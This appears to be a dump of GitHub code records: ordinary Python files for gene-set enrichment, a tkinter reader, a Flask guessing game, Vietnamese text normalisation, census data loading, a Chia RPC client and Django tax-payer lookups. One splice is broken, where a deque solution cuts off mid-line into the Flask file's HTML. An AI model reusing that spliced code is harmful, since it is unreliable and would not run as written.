for mouse\", default=9606)\nparser.add_argument(\"-ann\", \"--annotation\", type=str, help=\"select annotation to use\", default=\"WikiPathways\")\nparser.add_argument(\"-out\", \"--output\", type=str, help=\"output file\", default=\"out.json\")\nparser.add_argument(\"-tfs\", \"--tfs\", type=str, help=\"list of tfs divided by commas (STAT1,STAT2,IRF1) or file to read in txt format\",default = \"STAT1,STAT2,IRF1\")\nargs = parser.parse_args()\nconfig = vars(args)\n\ntfs = config[\"tfs\"]\nout = config[\"output\"]\nfile_extension = pathlib.Path(out).suffix\nannotation = config[\"annotation\"]\ndatabase = config[\"database\"]\norganism = config[\"organism\"]\n\n# print(\"Perfoming enrichment analysis on \"+annotation)\n\nif tfs.endswith(\".txt\"):\n if os.path.exists(tfs):\n tfs = pandas.read_csv(tfs,header=None)[0].tolist()\n if type(tfs) != list:\n print(\"Error\")\n print(\"Incorrect format file. One column with TFs names is required\")\n sys.exit()\nelif type(tfs.split(\",\")) == list:\n tfs = tfs.split(\",\")\nelse:\n print(\"Error\")\n print(\"Incorrect format file. One column with TFs names is required\")\n\n\n\n# Read databases\ndorotheadb = getDorotheaDB(confidence=database, org=organism)\nannFileTable = \"data/\"+annotation+\".tsv\"\nannTable = pandas.read_csv(annFileTable, sep=\"\\t\")\nannTable = annTable.loc[annTable.organism == organism]\n\n## Change the next line if you want to perform less types of enrichment analysis\ntypesOfAnalysis = [\"TFs_Hypergeom\", \"Target_Hypergeom\", \"Target_NonCentral\"]\nuniverseGenes = list(set(annTable.symbol.tolist()))\nannTableDict = annTable.groupby('annotation_id').apply(lambda x:x[\"symbol\"].tolist()).to_dict()\nterms = list(set(annTable.annotation_id))\nN = len(list(set(annTable.symbol.tolist())))\n\n\n\nif file_extension == \".json\":\n fullRes = {}\nelse:\n fullRes = []\n\nfor typeOfAnalysis in typesOfAnalysis:\n # print(\"Performing \"+typeOfAnalysis+\" enrichment analysis\")\n if typeOfAnalysis == \"TFs_Hypergeom\":\n dorotheadbTest = dorotheadb.loc[dorotheadb.tf.isin(annTable.symbol)]\n tfsTest = list(set(dorotheadbTest.loc[dorotheadbTest.tf.isin(tfs)].tf.tolist()))\n res = {}\n if len(tfsTest) == 0:\n for term in terms:\n res[term] = [1,\",\".join(tfsTest)]\n else:\n for term in terms:\n insideGenes = annTableDict[term]\n k = len(tfsTest)\n m = len(insideGenes)\n x = len(list(set(insideGenes) & set(tfsTest)))\n pval = hypergeom.sf(x-1,N,m,k)\n res[term] = [pval,\",\".join(tfsTest)]\n elif typeOfAnalysis == \"Target_Hypergeom\":\n dorotheadbTest = dorotheadb.loc[dorotheadb.target.isin(annTable.symbol)]\n targetTest = list(set(dorotheadbTest.loc[dorotheadbTest.tf.isin(tfs)].target.tolist()))\n res = {}\n if len(targetTest) == 0:\n for term in terms:\n res[term] = [1,\",\".join(targetTest)]\n else:\n for term in terms:\n insideGenes = annTableDict[term]\n k = len(targetTest)\n m = len(insideGenes)\n x = len(list(set(insideGenes) & set(targetTest)))\n pval = hypergeom.sf(x-1,N,m,k)\n res[term] = [pval,\",\".join(targetTest)]\n else:\n dorotheadbTest = dorotheadb.loc[dorotheadb.target.isin(annTable.symbol)]\n targetTest = list(set(dorotheadbTest.loc[dorotheadbTest.tf.isin(tfs)].target.tolist()))\n res = {}\n if len(targetTest) == 0:\n for term in terms:\n res[term] = [1,\",\".join(targetTest)]\n else:\n biasFile = \"data/\"+database+\"_\"+annotation+\".json\"\n if os.path.exists(biasFile):\n f = open(biasFile)\n bias = json.load(f)\n f.close()\n else:\n bias = {gene:len(dorotheadbTest.loc[dorotheadbTest.target.isin([gene])].tf.tolist()) for gene in universeGenes}\n f = open(biasFile, \"w\")\n json.dump(bias, f)\n f.close()\n de = {gene:1 if gene in targetTest else 0 for gene in universeGenes}\n dd = defaultdict(list)\n for d in (bias, de):\n for key, value in d.items():\n dd[key].append(value)\n\n bias = [dd[gene][0] for gene in universeGenes]\n de = [dd[gene][1] for gene in universeGenes]\n weigth = getGAModds(bias, de)\n weigth = dict(zip(universeGenes, weigth))\n\n for term in terms:\n insideGenes = annTableDict[term]\n insideWeigthSum = numpy.mean([weigth[gene] for gene in insideGenes])\n outsideGenes = [gene for gene in universeGenes if gene not in insideGenes]\n outsideWeigthSum = numpy.mean([weigth[gene] for gene in outsideGenes])\n oddRatio = insideWeigthSum / outsideWeigthSum\n k = len(targetTest)\n m = len(insideGenes)\n x = len(list(set(insideGenes) & set(targetTest)))\n if oddRatio == 1:\n pval = hypergeom.sf(x-1,N,m,k)\n else:\n pval = nchypergeom_wallenius.sf(x-1, N, m, k, oddRatio)\n if pval == 0:\n pval = hypergeom.sf(x-1,N,m,k)\n res[term] = [pval,\",\".join(targetTest)]\n pvals = [res[term][0] for term in terms]\n input = [res[term][1] for term in terms]\n ranking = rankdata(pvals)\n ranking = {terms[i]: ranking[i] for i in range(len(terms))}\n pvals = {terms[i]: pvals[i] for i in range(len(terms))}\n input = {terms[i]: input[i] for i in range(len(terms))}\n if file_extension == \".json\":\n fullRes[typeOfAnalysis] = {\"pval\":pvals, \"ranking\":ranking, \"input\": input}\n else:\n fullRes.append({\"annotation_id\":terms, \"typeOfAnalysis\":[typeOfAnalysis]*len(terms), \"pval\":list(pvals.values()), \"ranking\":list(ranking.values()), \"input\":list(input.values())})\n\nif file_extension == \".json\":\n f = open(out, \"w\")\n json.dump(fullRes, f)\n f.close()\nelse:\n concatContent = pandas.DataFrame({\"annotation_id\":[],\"typeOfAnalysis\":[],\"pval\":[],\"ranking\":[],\"input\":[]})\n for i in range(len(fullRes)):\n content = pandas.DataFrame.from_dict(fullRes[i])\n concatContent = pandas.concat([concatContent,content])\n concatContent = concatContent.sort_values(by=\"ranking\")\n if (file_extension == \".txt\") | (file_extension == \".tsv\"):\n concatContent.to_csv(out,sep=\"\\t\",index=None)\n else:\n concatContent.to_csv(out,sep=\",\",index=None)\n","repo_name":"GENyO-BioInformatics/TFs_Wallenius_Enrichement","sub_path":"TFsEnrichment.py","file_name":"TFsEnrichment.py","file_ext":"py","file_size_in_byte":7146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40715814055","text":"import tkinter as tk\nfrom tkinter import filedialog\n\ndef open_file():\n # ファイルダイアログでファイルを選択し、テキストボックスにパスを挿入\n file_path = filedialog.askopenfilename()\n entry_file_path.delete(0, tk.END)\n entry_file_path.insert(0, file_path)\n\ndef read_file():\n # テキストボックスからファイルパスを取得し、そのファイルを読み込む\n file_path = entry_file_path.get()\n if file_path:\n with open(file_path, 'r') as file:\n content = file.read()\n print(content)\n\ndef main():\n # GUIの初期設定\n root = tk.Tk()\n root.geometry('500x100')\n\n # フレームを作成し、ウィジェットを配置\n frame = tk.Frame(root)\n frame.pack(pady=10)\n\n # テキストボックスの設定\n global entry_file_path\n entry_file_path = tk.Entry(frame, width=50)\n entry_file_path.pack(side=tk.LEFT)\n\n # 開くボタンの設定\n button_open = tk.Button(frame, text='開く', command=open_file)\n button_open.pack(side=tk.LEFT, padx=5)\n\n # 読み込みボタンの設定\n button_read = tk.Button(frame, text='読み込み', command=read_file)\n button_read.pack(side=tk.LEFT)\n\n root.mainloop()\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"id774/sandbox","sub_path":"python/tkinter/fileread.py","file_name":"fileread.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"ja","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"20505803791","text":"from collections import deque as dq\nn=int(input())\na=list(map(int,input().split()))\nb=a[:]\na=dq(a)\nans=[]\n# a.reverse()\n# while len(a)>0 and len(b)>0:\n# if a[len(a)-1]>b[len(b)-1]:\n# ans.append(1)\n# b.pop()\n# elif a[len(a)-1]0 and len(b)>0:\n if a[0]>b[len(b)-1]:\n ans.append(1)\n b.pop()\n elif a[0]Welcome to the higher lower game!\" \\\n \"

Guess a number between 0 and 9

\" \\\n \"\"\n\n\n@app.route('/')\ndef guesspage(number):\n if number < random_number:\n return \"

Too low, try again!

\" \\\n \"\"\n if number > random_number:\n return \"

Too high, try again!

\" \\\n \"\"\n if number == random_number:\n return \"

You got it!

\" \\\n \"\"\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"Johnnyghub/100DaysOfPython","sub_path":"Day 54 + 55/Higher Lower Proj/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"10949411917","text":"import regex as re\nfrom underthesea import word_tokenize\nimport pickle\n\n# hàm xoá html code\ndef remove_html(txt):\n return re.sub(r'<[^>]*>', '', txt)\n\ndef loaddicchar():\n dic = {}\n char1252 = 'à|á|ả|ã|ạ|ầ|ấ|ẩ|ẫ|ậ|ằ|ắ|ẳ|ẵ|ặ|è|é|ẻ|ẽ|ẹ|ề|ế|ể|ễ|ệ|ì|í|ỉ|ĩ|ị|ò|ó|ỏ|õ|ọ|ồ|ố|ổ|ỗ|ộ|ờ|ớ|ở|ỡ|ợ|ù|ú|ủ|ũ|ụ|ừ|ứ|ử|ữ|ự|ỳ|ý|ỷ|ỹ|ỵ|À|Á|Ả|Ã|Ạ|Ầ|Ấ|Ẩ|Ẫ|Ậ|Ằ|Ắ|Ẳ|Ẵ|Ặ|È|É|Ẻ|Ẽ|Ẹ|Ề|Ế|Ể|Ễ|Ệ|Ì|Í|Ỉ|Ĩ|Ị|Ò|Ó|Ỏ|Õ|Ọ|Ồ|Ố|Ổ|Ỗ|Ộ|Ờ|Ớ|Ở|Ỡ|Ợ|Ù|Ú|Ủ|Ũ|Ụ|Ừ|Ứ|Ử|Ữ|Ự|Ỳ|Ý|Ỷ|Ỹ|Ỵ'.split(\n '|')\n charutf8 = \"à|á|ả|ã|ạ|ầ|ấ|ẩ|ẫ|ậ|ằ|ắ|ẳ|ẵ|ặ|è|é|ẻ|ẽ|ẹ|ề|ế|ể|ễ|ệ|ì|í|ỉ|ĩ|ị|ò|ó|ỏ|õ|ọ|ồ|ố|ổ|ỗ|ộ|ờ|ớ|ở|ỡ|ợ|ù|ú|ủ|ũ|ụ|ừ|ứ|ử|ữ|ự|ỳ|ý|ỷ|ỹ|ỵ|À|Á|Ả|Ã|Ạ|Ầ|Ấ|Ẩ|Ẫ|Ậ|Ằ|Ắ|Ẳ|Ẵ|Ặ|È|É|Ẻ|Ẽ|Ẹ|Ề|Ế|Ể|Ễ|Ệ|Ì|Í|Ỉ|Ĩ|Ị|Ò|Ó|Ỏ|Õ|Ọ|Ồ|Ố|Ổ|Ỗ|Ộ|Ờ|Ớ|Ở|Ỡ|Ợ|Ù|Ú|Ủ|Ũ|Ụ|Ừ|Ứ|Ử|Ữ|Ự|Ỳ|Ý|Ỷ|Ỹ|Ỵ\".split(\n '|')\n for i in range(len(char1252)):\n dic[char1252[i]] = charutf8[i]\n return dic\n\ndicchar = loaddicchar()\n \n# Đưa toàn bộ dữ liệu qua hàm này để chuẩn hóa lại\ndef convert_unicode(txt):\n return re.sub(\n r'à|á|ả|ã|ạ|ầ|ấ|ẩ|ẫ|ậ|ằ|ắ|ẳ|ẵ|ặ|è|é|ẻ|ẽ|ẹ|ề|ế|ể|ễ|ệ|ì|í|ỉ|ĩ|ị|ò|ó|ỏ|õ|ọ|ồ|ố|ổ|ỗ|ộ|ờ|ớ|ở|ỡ|ợ|ù|ú|ủ|ũ|ụ|ừ|ứ|ử|ữ|ự|ỳ|ý|ỷ|ỹ|ỵ|À|Á|Ả|Ã|Ạ|Ầ|Ấ|Ẩ|Ẫ|Ậ|Ằ|Ắ|Ẳ|Ẵ|Ặ|È|É|Ẻ|Ẽ|Ẹ|Ề|Ế|Ể|Ễ|Ệ|Ì|Í|Ỉ|Ĩ|Ị|Ò|Ó|Ỏ|Õ|Ọ|Ồ|Ố|Ổ|Ỗ|Ộ|Ờ|Ớ|Ở|Ỡ|Ợ|Ù|Ú|Ủ|Ũ|Ụ|Ừ|Ứ|Ử|Ữ|Ự|Ỳ|Ý|Ỷ|Ỹ|Ỵ',\n lambda x: dicchar[x.group()], txt)\n\n# Danh sách nguyên âm và các dấu\nbang_nguyen_am = [['a', 'à', 'á', 'ả', 'ã', 'ạ', 'a'],\n ['ă', 'ằ', 'ắ', 'ẳ', 'ẵ', 'ặ', 'aw'],\n ['â', 'ầ', 'ấ', 'ẩ', 'ẫ', 'ậ', 'aa'],\n ['e', 'è', 'é', 'ẻ', 'ẽ', 'ẹ', 'e'],\n ['ê', 'ề', 'ế', 'ể', 'ễ', 'ệ', 'ee'],\n ['i', 'ì', 'í', 'ỉ', 'ĩ', 'ị', 'i'],\n ['o', 'ò', 'ó', 'ỏ', 'õ', 'ọ', 'o'],\n ['ô', 'ồ', 'ố', 'ổ', 'ỗ', 'ộ', 'oo'],\n ['ơ', 'ờ', 'ớ', 'ở', 'ỡ', 'ợ', 'ow'],\n ['u', 'ù', 'ú', 'ủ', 'ũ', 'ụ', 'u'],\n ['ư', 'ừ', 'ứ', 'ử', 'ữ', 'ự', 'uw'],\n ['y', 'ỳ', 'ý', 'ỷ', 'ỹ', 'ỵ', 'y']]\n# Danh sách dấu tương ứng với danh sách nguyên âm bên trên\nbang_ky_tu_dau = ['', 'f', 's', 'r', 'x', 'j']\n\n# Chuyển ký tự sang chỉ số (i, j), trong đó i là nguyên âm và j là dấu tương ứng\nnguyen_am_to_ids = {}\n\n# Tạo dict\nfor i in range(len(bang_nguyen_am)):\n for j in range(len(bang_nguyen_am[i]) - 1):\n nguyen_am_to_ids[bang_nguyen_am[i][j]] = (i, j)\nnguyen_am_to_ids['à']\n\n# Kiểm tra tính hợp lệ của từ trong tiếng Việt\n# Các nguyên âm sẽ đứng cạnh nhau tạo thành cụm, và mỗi từ tối đa 1 cụm nguyên âm\n# Nguyên->Ng(uyê)n, Chào->Ch(ào), Ngủ->Ng(ủ)\ndef is_valid_vietnam_word(word):\n chars = list(word)\n nguyen_am_index = -1\n \n # Duyệt từng ký tự trong một từ\n for index, char in enumerate(chars):\n x, y = nguyen_am_to_ids.get(char, (-1, -1)) # x xác định nguyên âm, y xác định dấu\n if x != -1: # Nếu char là nguyên âm\n if nguyen_am_index == -1: # Nếu chưa tìm thấy nguyên âm\n nguyen_am_index = index\n else: # Nếu đã tìm thấy nguyên âm\n if index - nguyen_am_index != 1: # Nếu nguyên âm không đứng cạnh nguyên âm đã tìm thấy\n return False\n nguyen_am_index = index\n return True\n\ndef chuan_hoa_dau_tu_tieng_viet(word):\n if not is_valid_vietnam_word(word): # Không phải từ tiếng việt sẽ không xử lý và trả lại.\n return word\n\n chars = list(word)\n dau_cau = 0\n nguyen_am_index = []\n qu_or_gi = False\n \n for index, char in enumerate(chars): # Duyệt từng ký tự\n x, y = nguyen_am_to_ids.get(char, (-1, -1))\n\n if x == -1: # Nếu ký tự là phụ âm\n continue\n elif x == 9: # check \"qu\"\n if index != 0 and chars[index - 1] == 'q':\n chars[index] = 'u'\n qu_or_gi = True\n elif x == 5: # check \"gi\"\n if index != 0 and chars[index - 1] == 'g':\n chars[index] = 'i'\n qu_or_gi = True\n \n if y != 0: # Nếu có dấu\n dau_cau = y\n chars[index] = bang_nguyen_am[x][0] # Bỏ dấu\n \n # Nếu không phải trường hợp 'qu' hoặc 'gi' hoặc là index khác 1 (nguyên âm từ ký tự thứ 3 trở đi)\n if not qu_or_gi or index != 1:\n nguyen_am_index.append(index)\n \n if len(nguyen_am_index) < 2:\n if qu_or_gi:\n if len(chars) == 2:\n x, y = nguyen_am_to_ids.get(chars[1])\n chars[1] = bang_nguyen_am[x][dau_cau]\n else:\n x, y = nguyen_am_to_ids.get(chars[2], (-1, -1))\n if x != -1:\n chars[2] = bang_nguyen_am[x][dau_cau]\n else:\n chars[1] = bang_nguyen_am[5][dau_cau] if chars[1] == 'i' else bang_nguyen_am[9][dau_cau]\n return ''.join(chars)\n return word\n\n for index in nguyen_am_index:\n x, y = nguyen_am_to_ids[chars[index]]\n if x == 4 or x == 8: # ê, ơ\n chars[index] = bang_nguyen_am[x][dau_cau]\n return ''.join(chars)\n\n if len(nguyen_am_index) == 2:\n if nguyen_am_index[-1] == len(chars) - 1:\n x, y = nguyen_am_to_ids[chars[nguyen_am_index[0]]]\n chars[nguyen_am_index[0]] = bang_nguyen_am[x][dau_cau]\n else:\n x, y = nguyen_am_to_ids[chars[nguyen_am_index[1]]]\n chars[nguyen_am_index[1]] = bang_nguyen_am[x][dau_cau]\n else:\n x, y = nguyen_am_to_ids[chars[nguyen_am_index[1]]]\n chars[nguyen_am_index[1]] = bang_nguyen_am[x][dau_cau]\n return ''.join(chars)\n\n# Chuẩn hoá dấu câu cho cả câu và đưa về dạng viết thường\ndef chuan_hoa_dau_cau_tieng_viet(sentence):\n sentence = sentence.lower() # Chuyển về dạng viết thường\n words = sentence.split()\n \n # Xử lý trên từng từ\n for index, word in enumerate(words):\n cw = re.sub(r'(^\\p{P}*)([p{L}.]*\\p{L}+)(\\p{P}*$)', r'\\1/\\2/\\3', word).split('/')\n if len(cw) == 3:\n cw[1] = chuan_hoa_dau_tu_tieng_viet(cw[1])\n words[index] = ''.join(cw)\n return ' '.join(words)\n\ndef remove_unnecessary_character(document):\n # Xoá các ký tự không cần thiết\n document = re.sub(r'[^\\s\\wáàảãạăắằẳẵặâấầẩẫậéèẻẽẹêếềểễệóòỏõọôốồổỗộơớờởỡợíìỉĩịúùủũụưứừửữựýỳỷỹỵđ_]',' ',document)\n # Xoá khoảng trắng thừa\n document = re.sub(r'\\s+', ' ', document).strip()\n return document\n\ndef text_preprocessing(document):\n # Xoá html code\n document = remove_html(document)\n # Chuẩn hóa unicode\n document = convert_unicode(document)\n # Chuẩn hóa cách gõ dấu tiếng Việt và đưa về dạng viết thường\n document = chuan_hoa_dau_cau_tieng_viet(document)\n # Tách từ\n document = word_tokenize(document, format=\"text\")\n # Xóa các ký tự không cần thiết và khoảng trắng thừa\n document = remove_unnecessary_character(document)\n return document\n\nstopwords = pickle.load(open('Data/saved/stopwords.sav', 'rb'))\n# Loại bỏ stopword\ndef remove_stopwords(document):\n words = document.split(' ')\n res = list()\n for word in words:\n if word not in stopwords:\n res.append(word)\n return ' '.join(res)\n","repo_name":"trandinhnguyen/VietnameseNewClassification","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":8418,"program_lang":"python","lang":"vi","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"73851986053","text":"import os\nimport glob\nimport json\nimport urllib\n\nimport addfips\nimport us\nimport geopandas\nimport pandas as pd\nimport requests\nimport tempfile\nimport zipfile\n\nimport tqdm.auto as tqdm\n\nimport electiondata as e\nfrom permacache import permacache\n\nfrom py_essentials import hashing\n\n\ndef block_to_zcta():\n with zipfile.ZipFile(\"../census_downloader/outputs/block_to_zcta_2020.zip\") as zf:\n with zf.open(\"block_to_zcta_2020.json\") as f:\n return json.load(f)\n\n\n@permacache(\n \"population_density/load_blocks_2\",\n key_function=dict(path=lambda path: hashing.fileChecksum(path, \"sha256\")),\n)\ndef load_blocks(path):\n result = pd.read_csv(path)\n blocks = result[(result.BLOCK == result.BLOCK) & (result.POP100 > 0)].copy()\n blocks.COUNTY = blocks.COUNTY.apply(lambda x: f\"{int(x):03d}\")\n blocks[\"FIPS\"] = (\n blocks.STUSAB.apply(lambda x: us.states.lookup(x).fips) + blocks.COUNTY\n )\n btz = block_to_zcta()\n blocks[\"ZCTA\"] = blocks[\"GEOID\"].apply(lambda x: btz.get(x, \"NOZIP\"))\n return blocks\n\n\n@permacache(\"population_density/load_subcounties_geojson\")\ndef load_subcounties_geojson():\n tempdir = tempfile.TemporaryDirectory()\n rootpath = tempdir.name\n\n os.system(f\"mkdir -p {rootpath}\")\n root = \"https://www2.census.gov/geo/tiger/TIGER2020PL/LAYER/COUSUB/2020/\"\n [table] = pd.read_html(root)\n for path in tqdm.tqdm(\n [x for x in table.Name if isinstance(x, str) and x[10] == \"_\"]\n ):\n with urllib.request.urlopen(root + path) as f:\n data = f.read()\n with open(f\"{rootpath}/{path}\", \"wb\") as f:\n f.write(data)\n for path in tqdm.tqdm(glob.glob(f\"{rootpath}/*.zip\")):\n os.system(f\"cd {rootpath}; unzip {path}\")\n for path in tqdm.tqdm(glob.glob(f\"{rootpath}/*.shp\")):\n geopandas.read_file(path).to_file(f\"{path}.geojson\", driver=\"GeoJSON\")\n results = {}\n for path in tqdm.tqdm(glob.glob(f\"{rootpath}/*.geojson\")):\n with open(path) as f:\n res = json.load(f)\n assert set(res) == {\"type\", \"crs\", \"features\"}\n assert res[\"type\"] == results.get(\"type\", res[\"type\"])\n assert res[\"crs\"] == results.get(\"crs\", res[\"crs\"])\n results[\"features\"] = results.get(\"features\", []) + res[\"features\"]\n results[\"features\"] = [\n dict(\n **x,\n id=x[\"properties\"][\"STATEFP20\"]\n + x[\"properties\"][\"COUNTYFP20\"]\n + x[\"properties\"][\"COUSUBFP20\"],\n )\n for x in results[\"features\"]\n ]\n return results\n\n\ndef get_fips_to_state():\n return {x.fips: x.abbr for x in us.states.STATES_AND_TERRITORIES + [us.states.DC]}\n\n\n@permacache(\"population_density/get_fips_to_counties\")\ndef get_fips_to_counties():\n fips_to_state = get_fips_to_state()\n fips_to_counties = {\n a + c: f\"{b.title()}, {fips_to_state[a]}\"\n for a, bcs in addfips.AddFIPS()._counties.items()\n for b, c in bcs.items()\n if a in fips_to_state\n }\n fips_to_counties[\"02063\"] = \"Chugach, AK\"\n # fips_to_counties[\"02AL\"] = \"Alaska\"\n return fips_to_counties\n\n\n@permacache(\"population_density/get_subfips_to_subcounty_name\")\ndef get_subfips_to_subcounty_name():\n subcounties_geojson = load_subcounties_geojson()\n fips_to_counties = get_fips_to_counties()\n subfips_to_state = {}\n for x in subcounties_geojson[\"features\"]:\n fips = x[\"id\"][:5]\n if fips not in fips_to_counties:\n print(fips)\n continue\n subfips_to_state[x[\"id\"]] = (\n x[\"properties\"][\"NAME20\"] + \", \" + fips_to_counties[fips]\n )\n return subfips_to_state\n\n\n@permacache(\"population_density/load_data/load_county_geojson_2\")\ndef load_county_geojson():\n tempdir = tempfile.TemporaryDirectory()\n rootpath = tempdir.name\n os.system(f\"mkdir -p {rootpath}\")\n zip = requests.get(\n \"https://www2.census.gov/geo/tiger/GENZ2018/shp/cb_2018_us_county_500k.zip\"\n ).content\n with open(f\"{rootpath}/hi.zip\", \"wb\") as f:\n f.write(zip)\n os.system(f\"cd {rootpath}; unzip hi.zip\")\n\n geopandas.read_file(f\"{rootpath}/cb_2018_us_county_500k.shp\").to_file(\n f\"{rootpath}/hi.geojson\", driver=\"GeoJSON\"\n )\n with open(f\"{rootpath}/hi.geojson\") as f:\n counties_geojson = json.load(f)\n counties_geojson[\"features\"] = [\n dict(**x, id=x[\"properties\"][\"STATEFP\"] + x[\"properties\"][\"COUNTYFP\"])\n for x in counties_geojson[\"features\"]\n ]\n return counties_geojson\n","repo_name":"kavigupta/population-density-metric","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":4473,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"44"} +{"seq_id":"14202025421","text":"import aiohttp\nimport asyncio\n\nfrom typing import Dict, Optional, List\nfrom src.util.byte_types import hexstr_to_bytes\nfrom src.types.full_block import FullBlock\nfrom src.types.header import Header\nfrom src.types.sized_bytes import bytes32\nfrom src.util.ints import uint16, uint32, uint64\nfrom src.types.coin_record import CoinRecord\n\n\nclass FullNodeRpcClient:\n \"\"\"\n Client to Chia RPC, connects to a local full node. Uses HTTP/JSON, and converts back from\n JSON into native python objects before returning. All api calls use POST requests.\n Note that this is not the same as the peer protocol, or wallet protocol (which run Chia's\n protocol on top of TCP), it's a separate protocol on top of HTTP thats provides easy access\n to the full node.\n \"\"\"\n\n url: str\n session: aiohttp.ClientSession\n closing_task: Optional[asyncio.Task]\n\n @classmethod\n async def create(cls, port: uint16):\n self = cls()\n self.url = f\"http://localhost:{str(port)}/\"\n self.session = aiohttp.ClientSession()\n self.closing_task = None\n return self\n\n async def fetch(self, path, request_json):\n async with self.session.post(self.url + path, json=request_json) as response:\n response.raise_for_status()\n return await response.json()\n\n async def get_blockchain_state(self) -> Dict:\n response = await self.fetch(\"get_blockchain_state\", {})\n response[\"blockchain_state\"][\"tips\"] = [\n Header.from_json_dict(tip) for tip in response[\"blockchain_state\"][\"tips\"]\n ]\n response[\"blockchain_state\"][\"lca\"] = Header.from_json_dict(\n response[\"blockchain_state\"][\"lca\"]\n )\n return response[\"blockchain_state\"]\n\n async def get_block(self, header_hash) -> Optional[FullBlock]:\n try:\n response = await self.fetch(\"get_block\", {\"header_hash\": header_hash.hex()})\n except aiohttp.client_exceptions.ClientResponseError as e:\n if e.message == \"Not Found\":\n return None\n raise\n return FullBlock.from_json_dict(response[\"block\"])\n\n async def get_header_by_height(self, header_height) -> Optional[Header]:\n try:\n response = await self.fetch(\n \"get_header_by_height\", {\"height\": header_height}\n )\n except aiohttp.client_exceptions.ClientResponseError as e:\n if e.message == \"Not Found\":\n return None\n raise\n return Header.from_json_dict(response[\"header\"])\n\n async def get_header(self, header_hash) -> Optional[Header]:\n try:\n response = await self.fetch(\n \"get_header\", {\"header_hash\": header_hash.hex()}\n )\n except aiohttp.client_exceptions.ClientResponseError as e:\n if e.message == \"Not Found\":\n return None\n raise\n return Header.from_json_dict(response[\"header\"])\n\n async def get_unfinished_block_headers(self, height: uint32) -> List[Header]:\n response = await self.fetch(\"get_unfinished_block_headers\", {\"height\": height})\n return [Header.from_json_dict(r) for r in response[\"headers\"]]\n\n async def get_network_space(\n self, newer_block_header_hash: str, older_block_header_hash: str\n ) -> Optional[uint64]:\n try:\n network_space_bytes_estimate = await self.fetch(\n \"get_network_space\",\n {\n \"newer_block_header_hash\": newer_block_header_hash,\n \"older_block_header_hash\": older_block_header_hash,\n },\n )\n except aiohttp.client_exceptions.ClientResponseError as e:\n if e.message == \"Not Found\":\n return None\n raise\n return network_space_bytes_estimate[\"space\"]\n\n async def get_connections(self) -> List[Dict]:\n response = await self.fetch(\"get_connections\", {})\n for connection in response[\"connections\"]:\n connection[\"node_id\"] = hexstr_to_bytes(connection[\"node_id\"])\n return response[\"connections\"]\n\n async def open_connection(self, host: str, port: int) -> Dict:\n return await self.fetch(\"open_connection\", {\"host\": host, \"port\": int(port)})\n\n async def close_connection(self, node_id: bytes32) -> Dict:\n return await self.fetch(\"close_connection\", {\"node_id\": node_id.hex()})\n\n async def stop_node(self) -> Dict:\n return await self.fetch(\"stop_node\", {})\n\n async def get_unspent_coins(\n self, puzzle_hash: bytes32, header_hash: Optional[bytes32] = None\n ) -> List:\n if header_hash is not None:\n d = {\"puzzle_hash\": puzzle_hash.hex(), \"header_hash\": header_hash.hex()}\n else:\n d = {\"puzzle_hash\": puzzle_hash.hex()}\n return [\n CoinRecord.from_json_dict(coin)\n for coin in ((await self.fetch(\"get_unspent_coins\", d))[\"coin_records\"])\n ]\n\n async def get_heaviest_block_seen(self) -> Header:\n response = await self.fetch(\"get_heaviest_block_seen\", {})\n return Header.from_json_dict(response[\"tip\"])\n\n def close(self):\n self.closing_task = asyncio.create_task(self.session.close())\n\n async def await_closed(self):\n if self.closing_task is not None:\n await self.closing_task\n","repo_name":"spring3th/Exodus","sub_path":"src/rpc/full_node_rpc_client.py","file_name":"full_node_rpc_client.py","file_ext":"py","file_size_in_byte":5355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"36190631494","text":"from io import BytesIO\n\nfrom django.db.models import Q\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404\nfrom django.views.generic import View\nfrom django_pandas.io import read_frame\nfrom django_tables2.export import TableExport\nimport pandas as pd\nimport numpy as np\nfrom openpyxl import load_workbook\nfrom openpyxl.styles import Border, Side\n\nfrom credits.decorators import group_required\nfrom taxservices.models import *\nfrom taxservices.tables import *\nfrom docxtpl import DocxTemplate\n\nfrom .forms import *\n\nclass Search(View):\n def get(self, request):\n return render(request, 'taxservices/search_form.html')\n\n def post(self, request):\n bound_form = SearchForm(request.POST)\n if bound_form.is_valid():\n\n if bound_form.cleaned_data['type'] == 'J':\n model = JuridicalPerson.objects.filter(tin=bound_form.cleaned_data['tin']).first()\n if (not model):\n model = JuridicalPerson.services.get('yurnp1', {\n \"company_tin\": bound_form.cleaned_data['tin'],\n \"lang\":\"uz\"})\n else:\n model = PhysicalPerson.objects.filter(tin=bound_form.cleaned_data['tin']).first()\n if (not model):\n model = PhysicalPerson.services.get('fiznp1', {\n \"tin\": bound_form.cleaned_data['tin'],\n \"pinfl\": bound_form.cleaned_data['pinfl'],\n \"series_passport\": bound_form.cleaned_data['series'],\n \"number_passport\": bound_form.cleaned_data['number'],\n \"lang\": \"uz\"})\n if model is not None:\n model.save()\n return HttpResponseRedirect(reverse('payer_detail_url', args=(model.slug,)))\n else:\n bound_form.add_error('tin','Информации об этом ИНН не найдено.')\n\n return render(request, 'taxservices/search_form.html', context={'form': bound_form})\n\n\n# JURIDICAL PERSON SERVICES\nclass PayerDetail(View):\n def get(self, request, slug):\n if slug[0] == 'J':\n person = JuridicalPerson.objects.filter(slug=slug).first()\n return render(request, 'taxservices/payer_detail_juridical.html', context={'person': person})\n else:\n person = PhysicalPerson.objects.get(slug=slug)\n return render(request, 'taxservices/payer_detail_physical.html', context={'person': person})\n\nclass EmployeeList(View):\n def get(self, request, slug):\n person = JuridicalPerson.objects.filter(slug=slug).first()\n employee = Employee.services.all('yur-employee-count', {\"tin\": person.tin, \"year\": \"2019\", \"lang\": \"uz\"})\n table = 